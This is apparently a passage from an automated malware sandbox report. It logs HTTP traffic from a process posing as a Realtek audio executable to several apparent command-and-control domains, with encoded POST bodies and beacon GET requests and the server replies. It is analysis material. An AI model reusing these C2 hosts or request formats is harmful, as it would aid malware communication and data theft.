                                                                                32192.168.11.204977366.29.149.46807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:35.641129971 CET2578OUTPOST /rb2m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Origin: http://www.golivenow.live
                                                                                Referer: http://www.golivenow.live/rb2m/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4f 75 62 46 70 57 65 4c 39 61 65 65 33 6f 38 43 58 47 6b 46 58 4e 36 2f 32 72 49 6f 6d 53 2f 6b 6b 66 4c 63 6d 48 74 6d 44 35 57 33 42 6c 65 2f 6c 34 34 6f 2f 6b 32 57 6e 48 53 65 44 32 77 75 30 4d 37 72 78 4f 37 56 4f 54 45 4e 6e 41 73 47 6b 61 32 6c 54 64 38 30 78 45 37 53 32 39 4e 46 52 4c 79 6d 74 58 56 55 69 44 44 42 34 52 59 6d 69 62 58 78 33 58 72 73 66 47 4d 46 59 42 7a 50 46 48 38 55 48 66 67 31 53 48 58 6d 4c 30 48 34 77 2b 43 58 63 2f 49 74 30 61 57 72 6b 42 4e 39 49 58 4c 6e 78 4e 45 50 6d 55 67 4c 52 51 6f 74 6d 79 48 35 50 65 31 69 2f 2f 6c 74 77 58 58 32 58 72 58 4e 48 68 46 36 58 63 34 69 78 49 6d 64 59 41 59 38 74 6b 4f 41 59 4c 66 77 61 59 30 66 70 72 6a 57 50 54 4e 4e 6f 4c 52 59 38 51 77 77 62 66 72 68 45 62 69 6a 30 57 4b 33 55 6e 6d 56 75 51 72 42 59 55 54 72 6c 76 2f 49 6e 50 34 37 76 42 33 52 31 73 6a 30 31 51 70 77 7a 55 51 76 67 30 61 6d 38 50 2f 49 77 6d 46 51 64 64 44 30 65 5a 45 66 47 75 31 54 64 73 67 6e 31 71 6b 4a 36 56 48 71 4d 75 55 73 45 36 41 4d [TRUNCATED]
                                                                                Data Ascii: 2WLcH=OubFpWeL9aee3o8CXGkFXN6/2rIomS/kkfLcmHtmD5W3Ble/l44o/k2WnHSeD2wu0M7rxO7VOTENnAsGka2lTd80xE7S29NFRLymtXVUiDDB4RYmibXx3XrsfGMFYBzPFH8UHfg1SHXmL0H4w+CXc/It0aWrkBN9IXLnxNEPmUgLRQotmyH5Pe1i//ltwXX2XrXNHhF6Xc4ixImdYAY8tkOAYLfwaY0fprjWPTNNoLRY8QwwbfrhEbij0WK3UnmVuQrBYUTrlv/InP47vB3R1sj01QpwzUQvg0am8P/IwmFQddD0eZEfGu1Tdsgn1qkJ6VHqMuUsE6AMgrvhjd1g7EmyIOH574kgrhpvhOm/reEF67gllCLVpt6EGrOXsUTw5FGdD0yMyuC54WCjWNefYS7qGmucFMEU43Fny/au1+nSybuZoMfg1ExhOu+W826iWQDeTWSHFRAdrf4GjjxD3e19tBLeUVZr22ohrdH4gKSYd1EXqxBrkdK70S6HFDuGJ5K63ykYsW+Nbl3sPA56s/0AvyGSIx9yVLniFZB7sqBmbUAkznqOqYi3Pq5WmU/4lSvpNKomrujexRgbRM5ArfvE1SNT2yOQ5RHvloR/9eJtnp/U1xOTerZbMiYRn9hf2QAtF6BfutOGn9Nmwj+VZq90ufg7TBkO1Jvui3FgdCM8N2FLoovRD81lISYFeLbO03SbBy8jLPIsbycuY6WPztuGZtgOvr5eIIdYdVEJHj6HAOWYm0+3bBWR1IxZv7d/PpQpvdoJ6twFBMtfRKUoD6Bp7zmkHkGlL3BwGFCOUr+JrMnwvlB73DxtUrmIhPtxXJNx2Eps0K0j1HzLeIxuO+niP2ihAcHK/YSGnMo6DglE7TtLDKFiDB6Ki/CmUw6SHuDynptws1RWlj+8CLMSqYuFMKTo/7dSCuvrxALj3jRxEiPAjfzVKHvRmWSk/hb4VK7f53VRLL9FDdeb5vgoMKsRx9O9iTjwaAQPzrMBZrOgte [TRUNCATED]
                                                                                Nov 25, 2024 11:59:35.641202927 CET5156OUTData Raw: 68 33 78 59 49 57 35 32 4e 78 34 72 61 69 36 38 78 75 55 38 57 66 53 33 4f 67 42 6b 49 38 58 5a 44 44 57 4e 43 41 6e 69 53 49 31 4c 6c 36 50 4d 41 51 77 52 4a 46 33 6c 57 50 30 52 65 43 74 6a 6e 4d 6d 2f 69 39 36 42 50 4b 70 39 51 48 72 41 69 54
                                                                                Data Ascii: h3xYIW52Nx4rai68xuU8WfS3OgBkI8XZDDWNCAniSI1Ll6PMAQwRJF3lWP0ReCtjnMm/i96BPKp9QHrAiTVwXPfN0unbS7c7eDGTstFTvqnm3L48U5k/aJ/78OW3EOPrHgxgg/Rif54BuuvdY0J1lpZjcmXPDUjNaAk9fuw+Ld0SjKHKTLoUhTZDlFhqwpyQUMnQuEQjRpPV5QdUNnPpuqMUv9uT+WRFaOQNOCGMhfOeL2YD4eP
                                                                                Nov 25, 2024 11:59:35.641217947 CET159OUTData Raw: 5a 52 67 31 50 73 7a 4b 4d 55 41 65 30 54 48 66 38 63 72 75 45 78 2b 58 34 62 67 2b 6b 45 49 42 6e 73 6e 6d 75 6a 72 59 51 41 5a 6c 73 6b 68 35 2b 4c 6c 62 43 51 47 53 43 69 39 61 59 70 79 54 59 48 48 66 73 65 64 53 78 52 47 51 31 59 61 34 62 76
                                                                                Data Ascii: ZRg1PszKMUAe0THf8cruEx+X4bg+kEIBnsnmujrYQAZlskh5+LlbCQGSCi9aYpyTYHHfsedSxRGQ1Ya4bv8ZYp6Tx6Vuf22DqIZNUJ8NWkhBGa3yyoeNz6iHxoiLXu08Wdn+bwY0ruQt8ClTXfms3em+oMNmw==
                                                                                Nov 25, 2024 11:59:35.818600893 CET637INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:35 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.11.204977466.29.149.46807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:38.326308966 CET456OUTGET /rb2m/?2WLcH=Dszlqgj74cWUzrw4FgoVa9SEyJwv0S7kouPjlT8bGIWxA2GhpIId8RbI+3ekZHN60cH9zamMOD41tV9XrOGIH+Ivz1i08chkDZaL4252rRmFu2Eqz92NoWw=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:38.501161098 CET652INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:38 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.11.204977581.88.58.216807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:43.968888044 CET736OUTPOST /2muc/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Origin: http://www.kanadeviainova.net
                                                                                Referer: http://www.kanadeviainova.net/2muc/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4d 45 73 49 4a 4e 54 4e 69 74 73 77 6e 77 61 61 41 65 36 33 34 5a 7a 51 39 72 35 75 34 4e 41 63 6b 71 79 55 77 34 62 74 4f 2b 36 6e 38 79 63 43 43 6e 79 51 68 54 62 55 66 36 6e 39 4a 4f 41 52 53 33 4e 41 76 46 54 71 46 46 77 6f 61 47 64 69 43 35 55 30 47 42 6e 6f 49 69 4e 4b 33 39 71 6b 7a 51 72 57 6e 68 39 77 44 72 47 44 41 5a 64 56 32 4e 49 56 4b 4b 47 4c 69 78 30 46 4f 78 76 4f 50 75 66 4e 73 56 54 4d 51 71 6c 46 78 7a 30 56 67 35 6f 54 68 4d 51 4a 6f 33 48 6a 5a 77 76 78 36 6b 6b 43 4b 38 52 62 2b 35 36 6b 72 6a 79 33 65 39 62 6b 78 33 42 5a 58 62 78 4e 6e 69 5a 35 4d 67 3d 3d
                                                                                Data Ascii: 2WLcH=MEsIJNTNitswnwaaAe634ZzQ9r5u4NAckqyUw4btO+6n8ycCCnyQhTbUf6n9JOARS3NAvFTqFFwoaGdiC5U0GBnoIiNK39qkzQrWnh9wDrGDAZdV2NIVKKGLix0FOxvOPufNsVTMQqlFxz0Vg5oThMQJo3HjZwvx6kkCK8Rb+56krjy3e9bkx3BZXbxNniZ5Mg==
                                                                                Nov 25, 2024 11:59:44.168876886 CET321INHTTP/1.1 405 Not Allowed
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 163
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.11.204977681.88.58.216807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:46.685868979 CET756OUTPOST /2muc/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Origin: http://www.kanadeviainova.net
                                                                                Referer: http://www.kanadeviainova.net/2muc/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4d 45 73 49 4a 4e 54 4e 69 74 73 77 6e 51 71 61 48 2f 36 33 77 5a 7a 58 34 72 35 75 6a 39 42 56 6b 71 32 55 77 38 44 48 4f 4e 65 6e 38 51 55 43 44 6a 6d 51 73 7a 62 55 4d 36 6e 34 57 65 42 64 53 33 52 79 76 48 48 71 46 45 55 6f 61 45 56 69 42 50 63 7a 55 68 6d 4f 41 43 4e 4d 35 64 71 6b 7a 51 72 57 6e 68 70 65 44 76 71 44 41 70 74 56 77 70 63 61 41 71 47 4d 30 42 30 46 4b 78 76 43 50 75 66 7a 73 51 79 70 51 70 64 46 78 7a 6b 56 67 72 51 51 76 4d 51 48 6c 58 48 78 63 79 53 65 33 33 6f 6c 46 62 78 49 6e 4c 57 4c 75 31 2f 74 44 50 76 41 79 6b 64 72 54 72 49 6c 6c 67 59 69 52 6f 4a 66 36 45 72 76 72 79 53 42 72 4f 4a 6b 5a 4b 51 77 55 70 73 3d
                                                                                Data Ascii: 2WLcH=MEsIJNTNitswnQqaH/63wZzX4r5uj9BVkq2Uw8DHONen8QUCDjmQszbUM6n4WeBdS3RyvHHqFEUoaEViBPczUhmOACNM5dqkzQrWnhpeDvqDAptVwpcaAqGM0B0FKxvCPufzsQypQpdFxzkVgrQQvMQHlXHxcySe33olFbxInLWLu1/tDPvAykdrTrIllgYiRoJf6ErvrySBrOJkZKQwUps=
                                                                                Nov 25, 2024 11:59:46.885819912 CET321INHTTP/1.1 405 Not Allowed
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:46 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 163
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.11.204977781.88.58.216807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:49.403465986 CET2578OUTPOST /2muc/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Origin: http://www.kanadeviainova.net
                                                                                Referer: http://www.kanadeviainova.net/2muc/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4d 45 73 49 4a 4e 54 4e 69 74 73 77 6e 51 71 61 48 2f 36 33 77 5a 7a 58 34 72 35 75 6a 39 42 56 6b 71 32 55 77 38 44 48 4f 4e 57 6e 39 69 73 43 43 42 4f 51 74 7a 62 55 50 36 6e 35 57 65 41 48 53 33 4a 32 76 48 4b 66 46 48 38 6f 62 68 42 69 41 39 30 7a 65 68 6d 4f 43 43 4e 4e 33 39 71 55 7a 51 36 66 6e 68 35 65 44 76 71 44 41 76 70 56 33 39 49 61 47 71 47 4c 69 78 30 4a 4f 78 75 56 50 75 48 6a 73 51 33 63 52 59 39 46 79 58 34 56 69 59 6f 51 6e 4d 51 46 67 58 47 69 63 79 65 42 33 33 30 70 46 62 74 69 6e 4e 57 4c 76 52 76 77 54 37 76 68 6a 55 35 48 58 4b 63 6e 30 52 6b 75 66 61 67 6e 2b 54 62 52 69 56 4b 5a 68 66 6c 6c 4f 72 77 4f 58 2b 64 39 37 75 34 6b 67 71 38 59 44 6c 79 43 41 62 7a 77 37 6e 68 6b 4e 7a 62 42 59 71 68 75 36 6c 2f 4d 50 55 63 53 59 6f 50 38 70 66 66 39 6f 33 34 75 67 74 75 76 6f 58 31 66 64 65 39 37 6b 77 73 59 42 68 35 45 4d 73 33 43 4e 63 5a 6f 71 39 76 69 6d 73 6a 55 5a 47 44 71 65 52 71 4a 6c 2f 65 75 68 6a 2b 55 34 4e 65 49 4e 4a 66 47 45 68 65 2f 66 71 79 6f [TRUNCATED]
                                                                                Data Ascii: 2WLcH=MEsIJNTNitswnQqaH/63wZzX4r5uj9BVkq2Uw8DHONWn9isCCBOQtzbUP6n5WeAHS3J2vHKfFH8obhBiA90zehmOCCNN39qUzQ6fnh5eDvqDAvpV39IaGqGLix0JOxuVPuHjsQ3cRY9FyX4ViYoQnMQFgXGicyeB330pFbtinNWLvRvwT7vhjU5HXKcn0Rkufagn+TbRiVKZhfllOrwOX+d97u4kgq8YDlyCAbzw7nhkNzbBYqhu6l/MPUcSYoP8pff9o34ugtuvoX1fde97kwsYBh5EMs3CNcZoq9vimsjUZGDqeRqJl/euhj+U4NeINJfGEhe/fqyoScgr38fFTBbqalXtALEik2gkO5pBH0b5vuJ56Qgv6c4ucKdL0iuiDJfwZL3JsWiFQlvkGOgHA+VKdT38GKLGHJn8BCAZRH2NzQsDLAA2RLoo75E9YpcEdCWJbQXsyUm9q6u6GPjrYnfLsg3VI/KAkbFbmwaZWJCsVt/liZAFhmaUqpOHMK+tS6WVA5L5Vmo0wGquu/Li1npFzzIpTp+gvqH5m+niYToseI1Jhr+Hqfu7qT9I3z/ZFCSZ+yIV2qnoHv25a0MecJsdBtVH0iuC/YgW4S9akdhKvvOX8ofMy1Yb7fUyXpo6oFGN5rrzREDArj/3jBEa5TQ8zaIj4AIpOFACMXqj3cDitpzG5DaKpD2Hw0GvG2sSzRDL+hWFscUcF8/A/rp0OJGwSUCYhjK6Cin35GUJiCrt3VIqpjsgAXz22oqBKbRLEUrlp8TXY4fKf/+5xCLliB0Cjvwou5JoAk4tqEDsXQn5cvEM7NfGJtNJSfApnY2PtodI+UmxQTYhHOWJYFp91PSMUTCr8s9LRJevJNu5KCEDO4PqVzZPnSZjsSOEiT0e/HvHQ6V9eufQ6dhtJoOWEUhGnqiWXlXiZSeY6mL9XomqaSqJPcNNHrCYRKNLYEYv8yWfaCdrnuHJ3Qf9oANnLzMCz9dFghCphGa1fzEP1cG2W0 [TRUNCATED]
                                                                                Nov 25, 2024 11:59:49.403516054 CET5327OUTData Raw: 32 35 6d 67 73 4f 76 55 45 67 6c 6c 72 6d 6b 59 62 30 6d 70 4a 4b 74 58 38 5a 57 43 56 65 75 41 57 31 33 6a 64 4f 44 6b 42 32 49 4c 67 30 4d 4f 4d 4f 4b 56 79 2f 31 4e 6f 4b 33 69 55 36 5a 53 79 30 43 37 47 6f 50 30 72 63 73 58 75 4d 79 6e 75 70
                                                                                Data Ascii: 25mgsOvUEgllrmkYb0mpJKtX8ZWCVeuAW13jdODkB2ILg0MOMOKVy/1NoK3iU6ZSy0C7GoP0rcsXuMynupmH5D1b+ST05PGTlUEi08xvcxamEbWxwx0+FybdujCqVy7eZBM+OwiG9HzcnFkcRX5IoQ6x/IB6OOz3LfiJNPQDcj7cUowKjxe7xpoBkNVTpUDS49GkD52zGp3O00tODRUd151arkwAfTbcU6QRGkVepiRH3aak1Dm
                                                                                Nov 25, 2024 11:59:49.603893042 CET321INHTTP/1.1 405 Not Allowed
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 163
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.11.204977881.88.58.216807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:52.119946003 CET460OUTGET /2muc/?2WLcH=BGEoK7nai7wQrj2aEM2P8qfkzKtqrNNfgf6S4Ju7MMLh1Bc/IyqyqzXdBYzJKfwOd0JT6GOuPVdJb0BzGYwvQg/AACFP7fG4nxHnnQpuCqy2cfx3+fFWSZg=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:52.319567919 CET240INHTTP/1.1 200 OK
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:52 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 1423
                                                                                Last-Modified: Thu, 01 Dec 2022 14:31:17 GMT
                                                                                Connection: close
                                                                                ETag: "6388bab5-58f"
                                                                                Accept-Ranges: bytes
                                                                                Nov 25, 2024 11:59:52.319710016 CET1289INData Raw: 3c 68 74 6d 6c 3e 0a 0a 20 20 20 20 3c 68 65 61 64 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 63 6f 75 72 74 65 73 79 22 20 63 6f 6e 74 65 6e 74 3d 22 33 63 39 63 34 38 65 30 35 37 65 36 37 61 36 35 39 64 65
                                                                                Data Ascii: <html> <head> <meta itemprop="courtesy" content="3c9c48e057e67a659de8367e29874141" /> <style> #content { left: 0; line-height: 200px; margin-top: -100px;
                                                                                Nov 25, 2024 11:59:52.319814920 CET134INData Raw: 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 77 65 6c 63 6f 6d 65 28 29 22 3e 0a 20 20 20 20 20 20 20
                                                                                Data Ascii: } </script> </head> <body onload="welcome()"> <h3 id='content' hidden></h3> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.11.2049779104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:57.617131948 CET733OUTPOST /zet9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Origin: http://www.mydreamdeal.click
                                                                                Referer: http://www.mydreamdeal.click/zet9/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
